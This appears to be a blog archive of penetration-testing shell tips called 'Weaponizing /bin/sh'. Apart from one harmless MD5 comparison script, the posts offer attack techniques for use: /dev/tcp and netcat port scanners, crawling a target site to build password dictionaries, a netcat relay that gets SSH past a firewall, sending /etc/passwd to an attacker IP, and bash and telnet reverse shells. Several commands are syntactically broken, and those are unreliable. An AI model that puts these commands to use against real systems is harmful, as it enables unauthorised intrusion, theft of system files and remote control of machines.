I love posts like these, 7 linux shells using only built in tools!
Category Archives: Weaponizing /bin/sh
Quickly Compare Multiple MD5 Hashes
Filed under Fu (a.k.a Tips), Weaponizing /bin/sh
Recently I was tasked with comparing the MD5 hash of multiple files to discover which were equivalent to each other. this was the little bit of script I came up with:
#!/bin/sh
for f in *.JPG
do
CURR=`md5 -q $f`
STRING="$f EQUALS:"
echo "Processing $f: $CURR"
for j in *.JPG
do
CHECK=`md5 -q $j`
if [ "$CURR" == "$CHECK" ]; then
STRING=$STRING$j
fi
done
echo "$STRING"
done
It simply loops through each file in a directory comparing the md5 hash to the hash of all the other files in the directory.
Another /dev/tcp port scanner
Filed under Fu (a.k.a Tips), Weaponizing /bin/sh
I stumbled across this while searching for alternate methods of port scanning via the command line. I guess my previous command didn’t work for everybody.
here it is:
for p in {1..1023} do (echo >/dev/tcp/localhost/$p) >/dev/null 2>&1 && echo "$p open" done
However, to get it to run on a single line of code, you just gotta add a little bit. Here it is:
for p in {1..1023}; do (echo "test" > /dev/tcp/127.0.0.1/$p) > →/dev/null 2>&1 && echo "$p open";
Enjoy!
Generating Targeted Dictionaries
Filed under Fu (a.k.a Tips), Weaponizing /bin/sh
Here are some tips I picked up on for generating targeted dictionaries for password attacks.
One Way
A simple process would involve something like this:
mkdir target
cd target
wget -r -l [depth_of_pages_to_retrieve] [target_site]
After that, you can go through each file (probably script it) and pull out unique words like this:
cat file.txt | sort | unique > targeted_dictionary.txt
That is a pretty messy way to do it though. Here is a better way:
A Better Way
mkdir /tmp/targetcd /tmp/targetwget -r -l [depth_of_pages_to_retrieve] [target_site]cd ..grep -h -r "" source | tr '[:space:]' '\n' | sort | uniq > targeted_dictionary.lstgrep -v '<' targeted_dictionary.lst > final_targeted_dictionary.lst
Note: make sure to include the square brackets in the first grep command. those are part of the command.
Standard Netcat Relay
Filed under Fu (a.k.a Tips), Weaponizing /bin/sh
Sometimes its useful to have little things like this available. But first, let me outline the scenario:
- You want ssh connection with a system
- The firewall is blocking inbound SSH connections
Assuming that you already have some sort of shell access on the target machine, This is your nice little work around:
$ mknod redirect p$ nc -l -p [permitted_inbound_port] 0< redirect | nc 127.0.0.1 22 1> redirect
It works with two simply steps:
- Creates a named pipe using the first command.
- Creates a netcat listener that will redirect incoming connections to our pipe, which in turn uses the contents of our pipe as the input for an ssh connection to localhost on the target machine.
To connect, you simply connect to the machine using the appropriate login, yet with a different port:
$ ssh [login]@[target] -p [port_of_netcat_listener]
You will obviously need netcat for this. Enjoy!
Heartbeat Detector for Services
Filed under Fu (a.k.a Tips), Weaponizing /bin/sh
This is a sweet little bit of command line kung-fu made available from Ed Skoudis. This will cause you to hear a heartbeat detection of a service. Therefore, when the service dies, so does the heartbeat. You just got to try it out! here it is!:
$ while (true); do nc -vv -z -w3 <target_ip> <target_port> > /dev/null &&echo -e "\x07"; sleep 1; done
This is for use on linux, and you will also need netcat.
enjoy!
/dev/tcp as a weapon
Filed under Fu (a.k.a Tips), Weaponizing /bin/sh
UPDATE: Check here to enable /dev/tcp on BackTrack
Here is some Fu to improve your game when pen testing *nix.
Situation: You have shell access to a *nix system. You are looking to create a reverse shell, scan other machines on the subnet, and do some file transfer (/etc/passwd). However, there are some things preventing you:
- Scope prevents you from uploading any files onto the machine
- A Firewall/AV prevents using something like netcat.
what do you do? Use /dev/tcp
What is /dev/tcp?
this is a system file that allows you to interact directly with the tcp protocol.
Fu
In order to get this to work, you need to be able to set up netcat listeners on your own machine. This can be done like this:
$ nc -l -p <port>
Transfer file:
This is pretty straight forward, just like you would image:
cat /etc/passwd > /dev/tcp/<Attacker_IP>/<Port>
Back on your listener console, you would then see the contents of /etc/passwd displayed. You would then easily pipe that into a file for parsing or future reference.
Port Scanner
This piece or art comes from Pen Testing Ninjitsu. To create a port scanner using built in bash commands, this is what you are looking to do:
$port = 1; while [$port -lt 1024];do echo > /dev/tcp/<TARG_IP>/$port;→ [$? == 0] && echo $port "is open" >> /tmp/ports.txt; port = 'expr → $port + 1'; done;
Let me break this down for you:
- Create a variable called port, and set its value equal to 1
port = 1;
- Create a loop that continues to run as long as the variable ‘port’ is less than 1024
while [$port -lt 1024];
- For each iteration, send some packets to the target IP address, with the port number equal to the current value of our ‘port’ variable
do echo > /dev/tcp/<TARG_IP>/$port;
- Check to see what the bash error value is as a result of that echo into /dev/tcp. Check to see if it is equal to zero, or in other words, check to see if there were no errors
[$? == 0]
- If it IS equal to zero, or in other words, there were no errors, append a string into /tmp/ports.txt stating that the last scanned port is open
&& echo $port "is open" >> /tmp/ports.txt;
- Now increment the value of ‘port’ by 1, and finish this iteration of the loop.
port = 'expr $port + 1'; done;
Pretty messy, but also fairly straight forward. You could then just read
Backdoor/Reverse Shell
This is pretty slick in my opinion. Replicates netcat almost exactly. Not as pretty as some things, but still nice:
/bin/bash -i > /dev/tcp/<Attacker_IP>/<port> 0<&1 2>&1
This is also straight forward:
- Invoke an interactive bash shell
/bin/bash -i
- Pipe that shell to the attacker (who has a netcat listener running)
> /dev/tcp/<Attacker_IP>/<port>
- Take standard input, and connect it to standard output. Do the same with standard error (2>)
0<&1 2>&1
Here is another variation the may work for others:
/bin/bash 0</dev/tcp/targ_ip/port 1>&0 2>&0
This can also be similarly done using telnet by doing the following (although you need two listeners):
telnet <attacker_ip> <port_a> | /bin/bash | telnet <attacker_ip> <port_b>
Pretty elite. hope it helps!
